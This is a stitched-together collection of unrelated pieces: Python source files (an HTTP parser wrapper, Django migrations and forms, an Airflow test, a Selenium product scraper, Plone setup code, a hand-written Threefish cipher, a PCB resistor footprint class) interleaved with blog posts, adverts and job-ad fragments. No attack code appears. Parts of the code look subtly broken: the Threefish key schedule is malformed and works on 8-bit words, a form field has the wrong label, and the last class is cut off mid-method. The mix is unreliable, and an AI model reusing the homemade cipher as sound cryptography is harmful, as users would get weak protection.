:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP request.
:returns: A :class:`Request <pycohttpparser.api.Request>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_request(
phr_buffer,
buffer_size,
self._method,
self._method_len,
self._path,
self._path_len,
self._minor_version,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
method = b''
path = b''
minor_version = -1
offset = self._method[0] - phr_buffer
element_len = self._method_len[0]
method = buffer[offset:offset+element_len]
offset = self._path[0] - phr_buffer
element_len = self._path_len[0]
path = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Request(method, path, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def parse_response(self, buffer):
"""
Parses a single HTTP response from a buffer.
:param buffer: A ``memoryview`` object wrapping a buffer containing a
HTTP response.
:returns: A :class:`Response <pycohttpparser.api.Response>` object, or
``None`` if there is not enough data in the buffer.
"""
# Allocate function inputs
buffer_size = ffi.cast("size_t", len(buffer))
phr_buffer = ffi.new("char []", buffer.tobytes())
last_len = ffi.cast("size_t", 0)
# Reset the header count.
self._num_headers[0] = self._header_count
# Do the parse.
pret = lib.phr_parse_response(
phr_buffer,
buffer_size,
self._minor_version,
self._status,
self._msg,
self._msg_len,
self._headers,
self._num_headers,
last_len
)
# Check for insufficient data or parse errors.
if pret == -2:
return None
elif pret == -1:
raise ParseError("Invalid message")
# If we got here we have a full request. We need to return useful
# data. A useful trick here: all the returned char pointers are
# pointers into buffer. This means we can use them as offsets and
# return memoryviews to their data. Snazzy, right?
msg = b''
status = 0
minor_version = -1
status = self._status[0]
offset = self._msg[0] - phr_buffer
element_len = self._msg_len[0]
msg = buffer[offset:offset+element_len]
minor_version = self._minor_version[0]
# We can create the Request object now, because all the scalar fields
# are ready. We can put the headers into a list already hung from it.
req = Response(status, msg, minor_version, [], pret)
for header in self._build_headers(phr_buffer, buffer):
req.headers.append(header)
return req
def _build_headers(self, phr_buffer, orig_buffer):
"""
Called by a parsing routine to build a collection of header names and
values.
"""
for index in range(self._num_headers[0]):
header_struct = self._headers[index]
name_index = header_struct.name - phr_buffer
value_index = header_struct.value - phr_buffer
name_len = header_struct.name_len
value_len = header_struct.value_len
name = orig_buffer[name_index:name_index+name_len]
value = orig_buffer[value_index:value_index+value_len]
yield (name, value)
|
St. Louis hip hop vets iLLPHONiCS have returned with a new two track bundle, including singles “Work” and “Make Your Move.” The tracks will be included on the band’s new 2019 project title dv8, and were produced by long time David Bowie producer Tony Visconti.
“Work” highlights the best parts of hip hop, with traces of influence from artists like The Roots, Tank & the Bangas, and even Anderson .Paak. iLLPHONiCS are seemingly a fine wine – only getting better with time.
Check out “Work and “Make Your Move” below.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-28 20:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0007_alter_validators_add_error_messages'),
('environment', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=64, unique=True)),
],
),
migrations.CreateModel(
name='LanguageSkill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.SmallIntegerField(choices=[(1, 'Basics'), (2, 'Intermediate'), (3, 'Fluent'), (4, 'Native')])),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Language')),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='profile', serialize=False, to=settings.AUTH_USER_MODEL)),
('role', models.CharField(choices=[('A', 'Admin'), ('R', 'Refugee'), ('M', 'Mentor')], db_index=True, max_length=1)),
('phone', models.CharField(blank=True, db_index=True, default='', max_length=32)),
('birth_year', models.IntegerField()),
('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),
('created', models.DateTimeField(blank=True, db_index=True, default=django.utils.timezone.now, editable=False)),
('last_modified', models.DateTimeField(auto_now=True, db_index=True)),
('city', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='environment.City')),
],
options={
'verbose_name': 'User profile',
'verbose_name_plural': 'User profiles',
},
),
migrations.AddField(
model_name='languageskill',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
For a limited time only because it's my birthday and I can do a book sale if I want to!
Book #1 in a two part series!
Mags McManus has just become a war widow in her mid-twenties. Her late husband, Randy, left for the Army right after their wedding. Instead of celebrating his homecoming and living in marital bliss with her soulmate, Mags finds herself living in constant agony. Dealing with the guilt of still living without Randy, are Randy's best friends and parents.
Rising from the ashes of this tragedy, Mags starts to learn how to love and trust again, finally being able to find happiness. But sometimes things really are too good to be true and again Mags learns how cruel the world can be as she crashes back down.
Mags McManus is far from a normal woman in her mid twenties. Being a war widow, a business professional, and a brokenhearted train wreck only skims the surface of the layers of who Margret McManus truly is. Waking up in a hospital bed, alone and confused, Mags once again has to pick up the pieces of her shattered heart. With her best friends by her side, Mags slowly starts to learn the answers she so desperately longs for. But is everything going to continue to spiral out of control? Or is there a light at the end of this dark, twisting tunnel where all the broken pieces can finally fall back together?
Note from the author: Second book in the two part Crashing Series. Crashing Back Down should be read before Falling Back Together to avoid spoilers. A portion of all royalties from Falling Back Together are donated by the author to The Marcie Mazzola Foundation.
I truly hope there's light at the end of the tunnel, Mags. The books sounds great!
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from datetime import datetime
from mock import Mock
from airflow import AirflowException
from airflow.ti_deps.deps.valid_state_dep import ValidStateDep
from airflow.utils.state import State
class ValidStateDepTest(unittest.TestCase):
def test_valid_state(self):
"""
Valid state should pass this dep
"""
ti = Mock(state=State.QUEUED, end_date=datetime(2016, 1, 1))
self.assertTrue(ValidStateDep({State.QUEUED}).is_met(ti=ti))
def test_invalid_state(self):
"""
Invalid state should fail this dep
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
self.assertFalse(ValidStateDep({State.FAILED}).is_met(ti=ti))
def test_no_valid_states(self):
"""
If there are no valid states the dependency should throw
"""
ti = Mock(state=State.SUCCESS, end_date=datetime(2016, 1, 1))
with self.assertRaises(AirflowException):
ValidStateDep({}).is_met(ti=ti)
|
The National Housing and Planning Advice Unit (NHPAU) was an independent body set up to advise national and local government and other bodies on the affordability of market housing. Its creation followed Kate Barker’s Review of Housing Supply in 2004 and her recommendation for the creation of a body to provide expert advice on housing matters, particularly affordability. The Unit was governed by an expert Board that was chaired by Professor Stephen Nickell, CBE, FBA, a former member of the Bank of England Monetary Policy Committee, and until 2012, Warden of Nuffield College, Oxford.
As part of its remit, NHPAU considered the implications of the Government’s national ambitions for long-term market affordability and housing supply on the level and broad distribution of future house building, disseminating and helping Government and the regions to develop consistent methodological practice in assessing market housing affordability. NHPAU also commissioned research on issues affecting affordability.
The NHPAU Board commissioned CCHPR to undertake research on the availability and quality of data sources relevant to the work of the NHPAU. This included, among others, data on individual income, household income, earnings, house prices, mortgages, property characteristics, second homes, vacancies, rents, household characteristics, construction, planning, migration and population.
The research project not only covered an assessment of the quality, coverage and comparability of the various data sources but also information on licensing arrangements, access, cost and restrictions on use. Several outputs were required, including briefing notes on the various data sources which could be used by members of the unit, a publication and a formal write-up of the research findings. Attendance at key meetings with data suppliers was also required.
Due to the dispersed nature of the data on affordability and related issues, it was important to ensure that all relevant stakeholders were consulted, and that the data held by these organisations was fully considered.
A good knowledge of the available data sources related to market housing affordability, and their strengths and weaknesses, was essential. It was also important for the research to understand the comparability of different data sources and highlight areas where there is a lack of good quality comprehensive data. This allowed the most appropriate data to be selected for each piece of work undertaken or commissioned by NHPAU researching the affordability of market housing.
|
#encoding: utf-8
from django import forms
from django_select2.forms import ModelSelect2MultipleWidget
# from django.contrib.auth.models import Group
from .models import Problem, ProblemTag
from ojuser.models import GroupProfile
class ProblemForm(forms.ModelForm):
is_spj = forms.NullBooleanField(widget=forms.CheckboxInput(), initial=False)
tags = forms.ModelMultipleChoiceField(required=False, queryset=ProblemTag.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]))
groups = forms.ModelMultipleChoiceField(required=True, queryset=GroupProfile.objects.all(),
widget=ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains'
]
))
class Meta:
model = Problem
exclude = ["superadmin", "is_checked", "created_time", "last_updated_time", "desc",
"code_length_limit"]
widgets = {
'groups': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains',
'nickname__icontains',
]
),
'tags': ModelSelect2MultipleWidget(
search_fields=[
'name__icontains'
]
)
}
def __init__(self, *args, **kwargs):
super(ProblemForm, self).__init__(*args, **kwargs)
self.fields['title'].label = u"题目"
self.fields['time_limit'].label = u"运行时间限制"
self.fields['memory_limit'].label = u"运行时间限制"
self.fields['groups'].label = u"所属用户组"
|
Putting a twist on their highly praised fruit concoctions, Milkman has added Menthol alternatives to their original lineup, and that includes the new Milkman E-Juice by Milkman. Making great use of their original mouthwatering fruit flavors, Milkman features a blend of summertime fruits that makes the most of a savory base. During the exhale, an unmistakeable fruit tart flavor is met by subtle vanilla bean undertones to deliver an overwhelming fruit-filled flavor that hydrates and replenishes the taste buds. Every time you take a draw, the fruity flavors dance along your palate elegantly without missing a beat. Mixed with MAX VG, Milkman E-Juice provides a chilly fruit-filled flavor sensation that should be in every vapers e-juice collection!
|
import datetime
import decimal
import calendar
from django.template import loader
from django.http import HttpResponseNotFound
from django.core.serializers.json import DjangoJSONEncoder
from django.http import HttpResponse
from django.utils.encoding import smart_unicode
from django.db import models
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _, ugettext
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, ListAdminView
from xadmin.views.dashboard import ModelBaseWidget, widget_manager
from xadmin.util import lookup_field, label_for_field, force_unicode, json
@widget_manager.register
class ChartWidget(ModelBaseWidget):
widget_type = 'chart'
description = _('Show models simple chart.')
template = 'xadmin/widgets/chart.html'
widget_icon = 'fa fa-bar-chart-o'
def convert(self, data):
self.list_params = data.pop('params', {})
self.chart = data.pop('chart', None)
def setup(self):
super(ChartWidget, self).setup()
self.charts = {}
self.one_chart = False
model_admin = self.admin_site._registry[self.model]
chart = self.chart
if hasattr(model_admin, 'data_charts'):
if chart and chart in model_admin.data_charts:
self.charts = {chart: model_admin.data_charts[chart]}
self.one_chart = True
if self.title is None:
self.title = model_admin.data_charts[chart].get('title')
else:
self.charts = model_admin.data_charts
if self.title is None:
self.title = ugettext(
"%s Charts") % self.model._meta.verbose_name_plural
def filte_choices_model(self, model, modeladmin):
return bool(getattr(modeladmin, 'data_charts', None)) and \
super(ChartWidget, self).filte_choices_model(model, modeladmin)
def get_chart_url(self, name, v):
return self.model_admin_url('chart', name) + "?" + urlencode(self.list_params)
def context(self, context):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.charts.items()],
})
# Media
def media(self):
return self.vendor('flot.js', 'xadmin.plugin.charts.js')
class JSONEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, (datetime.date, datetime.datetime)):
return calendar.timegm(o.timetuple()) * 1000
elif isinstance(o, decimal.Decimal):
return str(o)
else:
try:
return super(JSONEncoder, self).default(o)
except Exception:
return smart_unicode(o)
class ChartsPlugin(BaseAdminPlugin):
data_charts = {}
def init_request(self, *args, **kwargs):
return bool(self.data_charts)
def get_chart_url(self, name, v):
return self.admin_view.model_admin_url('chart', name) + self.admin_view.get_query_string()
# Media
def get_media(self, media):
return media + self.vendor('flot.js', 'xadmin.plugin.charts.js')
# Block Views
def block_results_top(self, context, nodes):
context.update({
'charts': [{"name": name, "title": v['title'], 'url': self.get_chart_url(name, v)} for name, v in self.data_charts.items()],
})
nodes.append(loader.render_to_string('xadmin/blocks/model_list.results_top.charts.html', context_instance=context))
class ChartsView(ListAdminView):
data_charts = {}
def get_ordering(self):
if 'order' in self.chart:
return self.chart['order']
else:
return super(ChartsView, self).get_ordering()
def get(self, request, name):
if name not in self.data_charts:
return HttpResponseNotFound()
self.chart = self.data_charts[name]
self.x_field = self.chart['x-field']
y_fields = self.chart['y-field']
self.y_fields = (
y_fields,) if type(y_fields) not in (list, tuple) else y_fields
datas = [{"data":[], "label": force_unicode(label_for_field(
i, self.model, model_admin=self))} for i in self.y_fields]
self.make_result_list()
for obj in self.result_list:
xf, attrs, value = lookup_field(self.x_field, obj, self)
for i, yfname in enumerate(self.y_fields):
yf, yattrs, yv = lookup_field(yfname, obj, self)
datas[i]["data"].append((value, yv))
option = {'series': {'lines': {'show': True}, 'points': {'show': False}},
'grid': {'hoverable': True, 'clickable': True}}
try:
xfield = self.opts.get_field(self.x_field)
if type(xfield) in (models.DateTimeField, models.DateField, models.TimeField):
option['xaxis'] = {'mode': "time", 'tickLength': 5}
if type(xfield) is models.DateField:
option['xaxis']['timeformat'] = "%y/%m/%d"
elif type(xfield) is models.TimeField:
option['xaxis']['timeformat'] = "%H:%M:%S"
else:
option['xaxis']['timeformat'] = "%y/%m/%d %H:%M:%S"
except Exception:
pass
option.update(self.chart.get('option', {}))
content = {'data': datas, 'option': option}
result = json.dumps(content, cls=JSONEncoder, ensure_ascii=False)
return HttpResponse(result)
site.register_plugin(ChartsPlugin, ListAdminView)
site.register_modelview(r'^chart/(.+)/$', ChartsView, name='%s_%s_chart')
|
cell culture, and processing human blood samples.
flexibility to work in a start-up environment.
healthcare benefits and a 401(k) plan.
|
#Funções de bitwise:
#Como tivemos problemas de tipagem, utilizamos um tipo próprio para a criptografia
#No caso, um array de 1s e 0s representando bits.
#E, claro, tivemos que criar operadores pra agir sobre esse novo "tipo".
def xor( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] ^ b[i]
return result
def mod( a, b ):
result = [0] * 8
for i in range( 7, -1, -1 ):
result[i] = a[i] & b[i]
return result
def add( a, b ):
result = [0] * 8
c = 0
for i in range( 7, -1, -1 ):
result[i] = ( a[i] ^ b[i] ) ^ c
c = ( ( a[i] | c ) & b[i] ) | ( a[i] & ( b[i] | c ) )
return result
def comp( a ):
return add( xor( a, [1,1,1,1,1,1,1,1]), [0,0,0,0,0,0,0,1])
def rol( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i - q ) >= 0:
result[ i - q ] = a[i]
else:
result[ 8 + i - q ] = a[i]
return result
def ror( a, b ):
result = [0] * 8
q = b % 8
for i in range( 7, -1, -1 ):
if ( i + q ) < 8:
result[ i + q ] = a[i]
else:
result[ i + q - 8 ] = a[i]
return result
#Funções da criptografia em si:
def permute( v, c = True ):
p = { True: [2,1,4,7,6,5,0,3], False : [6,1,0,7,2,5,4,3] }
aux = [ v[i] for i in p[c] ]
return aux
def mix( x0, x1, j, d, c = True):
R = [[46,33,17,44,39,13,25,8],
[36,27,49,9,30,50,29,35],
[19,14,36,54,34,10,39,56],
[37,42,39,56,24,17,43,22]] #Mais constantes fixas da descrição do algorítmo
if( c ):
y0 = add( x0, x1 )
y1 = xor( rol( x1, R[j][d%8] ), y0 )
else:
y1 = ror( xor(x0, x1), R[j][d%8] )
y0 = add(x0, comp( y1 ) ) #sub = add( a, ~b )
return y0, y1
def key_schedule( k, t ):
ks = []
kn = to_bit( 0x1BD11BDAA9FC1A22.to_bytes( 8, "big" ) ) #Tem um pq dessa constante em específico no pdf do algorítmo. É basicamente um nothing-up-my-sleeve number.
for i in range( 7 ): #Nw - 1
kn = xor( kn[0], k[i])
t2 = xor( t[1], t[2] )
t.extend(t2)
k.extend(kn)
for i in range( 19 ): #Nr/4 + 1
s = [None] * 8
for j in range( 5 ):
s[j] = k[ ( i + j ) % 9 ]
s[5] = add( k[ ( i + 5 ) % 9 ], t[ i % 3 ] )
s[6] = add( k[ ( i + 6 ) % 9 ], t[ ( i + 1 ) % 3 ] )
s[7] = add( k[ ( i + 7 ) % 9 ], to_bit( [i] )[0] )
ks.append( s )
return ks
#Algoritmo implementado a partir das instruções oficiais, disponiveis em:
#https://www.schneier.com/academic/paperfiles/skein1.3.pdf
#Nossa sugestão para melhorar seria adicionar um timestamp junto a mensagem a ser cifrada, que seria análisado pela aplicação.
#Isso impediria cópias de mensagens sniffadas.
def Threefish( w, k, t, c = True ):
w = to_bit( w )
k = to_bit( k )
t = to_bit( t )
ks = key_schedule( k, t )
result = []
for k in range( 0, len( w ), 8 ):
block = w[k:k+8]
if( c ):
for i in range( 72 ):
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], ks[int( i/4 )][j] )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, True )
block = permute( block, True )
else:
for i in range( 71, -1, -1 ):
block = permute( block, False )
for j in range( 4 ):
block[2*j], block[2*j+1] = mix( block[2*j], block[2*j+1], j, i, False )
if( ( i % 4 ) == 0 ):
for j in range( 8 ):
block[j] = add( block[j], comp( ks[int( i/4 )][j] ) )
result.extend( block )
if c:
return from_bit( result )
else:
padwan = ""
for digit in from_bit( result ):
padwan += chr( digit )
return pad( padwan, False )
#Abaixo, funções de conversão de string/int para um vetor de bits.
#Por problemas de tipagem, bytes davam erro no endereçamento, strings nas operações, e inteiros no numero de casas.
#(BTW, a função nativa bin() retorna uma string, por isso tive q fazer na mão)
#Esse ficou bonito ;)
def to_bit( data ):
if( isinstance( data, str ) ):
data = pad( data )
data = [ ord( data[i] ) for i in range( len( data ) ) ]
return [ [0] * ( 8 - len( bin( datum )[2:] ) ) + [ 1 if digit=='1' else 0 for digit in bin( datum )[2:] ] for datum in data ]
#Esse nem tanto =/
def from_bit( data ):
result = []
for datum in data:
c = 0
for i in range( 8 ):
c += datum[ 7 - i ] << i
result.append( c )
return result
#Padding especial que eu vi por aí mas não lembro o nome
#Adiciona como algarismo de pad o numero de casas cobertas, assim nunca exclui um caractér errado
#(Exceto caso a frase termine com um "1" e seja múltiplo de 8. Mas é bem mais border q acabar com 0, dos pads normais)
def pad( w, c = True):
result = w * 1
if c:
i = 8 - ( len( result ) % 8 )
if i < 8:
result += str(i) * i
else:
try:
p = int( result[-1] )
for i in range( -1, -p - 1, -1 ):
if( int( result[ i ] ) != p ):
raise
result = result[:-p]
except:
return result #Falha no padding
return result
def example_use( w = "Frase de Exemplo", k = "gurulhu!", t = "oi"):
print("Plaintext: ", w, "\nKey: ", k, "\nTweak: ", t )
cy = Threefish( w, k, t )
print("\nCypher:", [ chr( i ) for i in cy] )
cy = Threefish( cy, k, t, False )
print("\nResult: ", cy )
if __name__ == "__main__":
import sys
if len( sys.argv ) < 5:
print("Usage: threefish [plaintext] [key] [tweak] [encript]")
else:
if( sys.argv[4] in ["FALSE", "False", "false", "F", "f", "0", "D", "U", "d", "u", 0] ):
with open( sys.argv[1] ) as plainfile:
plaintext = [ int( c ) for c in plainfile.readlines() ]
print( Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3], c = False ) )
else:
with open( sys.argv[1] ) as plainfile:
plaintext = plainfile.read()
[ print( c ) for c in Threefish( w = plaintext, k = sys.argv[2], t = sys.argv[3] ) ]
|
Classes for dealing Online Certificate Status Protocol (OCSP) - RFC 2560.
BasicOCSPRespGenerator Generator for basic OCSP response objects.
OCSPRespGenerator base generator for an OCSP response - at the moment this only supports the generation of responses containing BasicOCSP responses.
RespID Carrier for a ResponderID.
|
# -- coding: utf-8 --
#-------------------------------------------------------------------------------
# Name: parser
# Purpose:
#
# Author: Ramakrishna
#
# Created: 08/09/2015
# Copyright: (c) Ramakrishna 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
import sqlite3, time
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.common.keys import Keys
from bs4 import BeautifulSoup, SoupStrainer
import urllib
BASE_URL = 'https://www.getpopulrrewards.com'
def main():
conn = driver = None
try:
driver = webdriver.Firefox()
conn = sqlite3.connect("gppr.db3")
cur = conn.cursor()
cur.execute("select id, catg, subcatg from links where done = 0 order by id")
review_urls = cur.fetchall()
driver.get('https://www.getpopulrrewards.com')
time.sleep(3)
for url in review_urls:
id = url[0]
catg = url[1]
subcatg = url[2]
next_page = ''
print catg, subcatg
try:
driver.find_element_by_link_text('SHOP ALL').click()
time.sleep(1)
driver.find_element_by_link_text(catg).click()
time.sleep(1)
driver.find_element_by_link_text(subcatg).click()
time.sleep(1)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
try:
main_window = driver.current_window_handle
try:
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
else:
next_page = '' # empty string as we want it to loop through the first page
except NoSuchElementException as e:
next_page = ''
print(e.__doc__)
print(e.args)
pass
while next_page != None:
links = driver.find_elements_by_class_name("shortDescription")
time.sleep(1)
for link in links:
name = points = item_no = prod_url = descr = notes = None
elem = link.find_element_by_tag_name('a')
elem.send_keys(Keys.CONTROL + Keys.RETURN)
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.TAB)
time.sleep(1)
second_window = driver.current_window_handle
driver.switch_to_window(second_window)
soup = BeautifulSoup(driver.page_source, parse_only=SoupStrainer('body'))
if soup != None:
try:
div_name = soup.find('span', {'id':'itemName'})
if div_name != None:
name = div_name.text.strip()
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "name not found"
pass
try:
div_item_no = soup.find('span', {'id':'itemNo'})
if div_item_no != None:
item_no = div_item_no.text
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item no not found"
pass
selected = soup.find('div', {'state':'selected'})
if selected != None:
url = selected['style']
prod_url = url[url.find("https"):url.find("?")]
#Save image locally
urllib.urlretrieve(prod_url, "images/" + item_no + ".jpg")
try:
desc = soup.find('div', {'id':'itemDescr'})
if desc != None:
descr = desc.getText("$$$")
'''
for d in desc.contents:
if d != None:
d = str(d)
descr += d.strip() if d != None else ''
'''
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "desc not found"
pass
'''
try:
note = soup.find('div', {'class':'itemSummary'})
if note != None:
note = note.contents
for n in note:
n = n.text.encode('ascii', 'ignore').decode('ascii').replace('\n','').strip()
notes += n + " "
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "item summary not found"
pass
'''
try:
div_points = soup.find_all('p', {'class':'points'})
if div_points != None:
for p in div_points:
if p.text.strip() != '':
points = p.text.strip()
break
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
print "points not found"
pass
sql = "insert into records(name, catg, subcatg, points, item_no, img_url, descr) values (?,?,?,?,?,?,?)"
#print name, catg, subcatg, points, item_no, prod_url, descr
print catg, subcatg, name
if name != None and points != None and item_no != None and prod_url != None:
cur.execute(sql, (name, catg, subcatg, points, item_no, prod_url, descr))
driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 'w')
time.sleep(1)
driver.switch_to_window(main_window)
cur.execute("update links set done = 1 where id = ? and done = 0", (str(id),))
conn.commit()
try:
next_page = None
pager = driver.find_element_by_class_name("pagination")
lis = pager.find_elements_by_tag_name("li")
if lis != None and len(lis) >= 3:
l = lis[3]
if l.find_element_by_tag_name('a') != None:
next_page = l.find_element_by_tag_name('a')
next_page.click()
else:
next_page = None
except IndexError as e:
print(e.__doc__)
print(e.args)
pass
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
driver.switch_to_window(main_window)
except NoSuchElementException as e:
print(e.__doc__)
print(e.args)
pass
except Exception as e:
print(e.__doc__)
print(e.args)
finally:
if conn != None:
conn.commit()
conn.close()
if driver != None:
driver.close()
if __name__ == '__main__':
main()
|
Why Is An Elevated Work Platform License So Important?
Do you have dreams of working in a risky environment like a construction site in the future? If you are, then you would know what a job in this kind of industry consists of. Working in a tough industry such as construction is never going to be easy for anyone because there is a lot of hard and risky work that you would need to so. Among all of this, working on top of elevated platforms like cranes and forklifts are a commonly done task. While it might sound easy to get in to a forklift and make your way to the top, it is actually very dangerous if you do not have the training to be doing it right. If you wish to prove your skill to others and want to work such a job, then you are going to need your elevated work platform license. This license is only going to come through intense training but here are some important reasons to have an elevated work platform license.
A wider chance for jobs!
Even though construction sites are seen to be using elevated work platforms a lot of the time, this is not the only job where an EWP license will come in handy for you! There are a lot of other high paying jobs that would require for you to work on a forklift or a scissor lift and so, proving you have gone through an elevated work platform training course by having your license, is going to show people you are capable of taking any great job. This is why an ewp license will open more doors for you!
While there are a lot of people trying to find their steady place in the world, there are others who have great jobs that they love doing. If you are someone with a good job in a construction related field, then you might want to think about moving up the ladder and developing your own career. Elevated work platform training and getting your ewp license is going to help you start your career journey and will help you make your way to the top with time!
Sometimes managers and supervisors in the field of construction are only going to monitor the work done by their employees but not having knowledge about their work is going to make this job harder for you. As a manager, if you wish to do the best, then getting your ewp license will help you better understand what your employees are doing.
|
import logging
from zope.interface import alsoProvides
from Products.CMFPlone.utils import getToolByName
from Products.MimetypesRegistry.MimeTypeItem import MimeTypeItem
from collective.geo.file.interfaces import IGisFile
# The profile id of your package:
PROFILE_ID = 'profile-collective.geo.file:default'
gis_mimetypes = [
{'name': 'application/vnd.google-earth.kml+xml',
'extensions': ('kml',),
'globs': ('*.kml',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/vnd.google-earth.kml+xml',)},
{'name': 'application/gpx+xml',
'extensions': ('gpx',),
'globs': ('*.gpx',),
'icon_path': 'text.png',
'binary': True,
'mimetypes': ('application/gpx+xml',)}
]
def do_nothing(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
logger.info("Empty upgrade step")
def attach_igisfile(context, logger=None):
catalog = getToolByName(context, 'portal_catalog')
brains = catalog(portal_type='File')
for brain in brains:
ob = brain.getObject()
mimetype = ob.content_type
if mimetype in ['application/vnd.google-earth.kml+xml',
'application/gpx+xml']:
if not IGisFile.providedBy(ob):
alsoProvides(ob, IGisFile)
reindex = True
def add_extract_menue(context, logger=None):
if logger is None:
# Called as upgrade step: define our own logger.
logger = logging.getLogger('collective.geo.file')
setup = getToolByName(context, 'portal_setup')
setup.runImportStepFromProfile(PROFILE_ID, 'actions')
def import_various(context):
"""Import step for configuration that is not handled in xml files.
"""
# Only run step if a flag file is present
if context.readDataFile('collective.geo.file-default.txt') is None:
return
logger = context.getLogger('collective.geo.file')
site = context.getSite()
mimetypes_registry = getToolByName(site, 'mimetypes_registry')
all_mimetypes = mimetypes_registry.list_mimetypes()
for mtype in gis_mimetypes:
if mtype['name'] not in all_mimetypes:
logger.info('Registering mimetype %s' % mtype['name'])
mimetypes_registry.register(MimeTypeItem(**mtype))
|
The Vastex V2000HD Series of heavy-duty manual screen printing presses offers the screen printing professional a range of advanced capabilities that decrease set-up time, improve registration accuracy and increase productivity.
The V2000HD heavy duty print head allows the industry's fastest set-up and micro-registration, and accepts clamp-on DiGiT athletic numbering jigs and side-clamp accessories in 20 seconds.
V2000HD screen printing presses are offered in models from 1 station/1 color to 10 station/10 color in increments of one station and/or one color. Fully expandable, they allow growing shops to start small and add stations and print heads to boost output or achieve special effects.
|
# From https://www.digikey.com/Web%20Export/Supplier%20Content/Vishay_8026/PDF/VishayBeyschlag_SolderPad.pdf?redirected=1
from babyfood.pcb.PCBUnits import mil
from babyfood.features.basic import CenteredRectangle, FilledCenteredRectangle
from babyfood.components.ABC import AbstractSMAComponent
resistorsParams = {
"0102": (0.65, 1.10, 1.40, 2.85),
"0204": (1.50, 1.25, 1.75, 4.00),
"0207": (2.80, 2.20, 2.20, 7.20),
"0402": (0.25, 0.60, 0.55, 1.45),
"0603": (0.50, 0.95, 0.95, 2.40),
"0805": (0.65, 1.10, 1.40, 2.85),
"1206": (1.50, 1.25, 1.75, 4.00)}
class SMAResistor(AbstractSMAComponent):
def __init__(self, codeString):
# Names on datasheet ref'ed above
_g, _y, _x, _z = resistorsParams[codeString]
# Names useful to us
self._w = _y
self._h = _x
shift = (_g / 2) + (_y / 2)
self._outline = int(codeString[0:2]) * 0.254, int(codeString[2:4]) * 0.254
print(self._outline)
self._centers = ((-shift, 0),
(+shift, 0))
def draw(self, ctx):
pad = FilledCenteredRectangle(self._w, self._h)
mask = FilledCenteredRectangle(self._w - 0.1, self._h - 0.1)
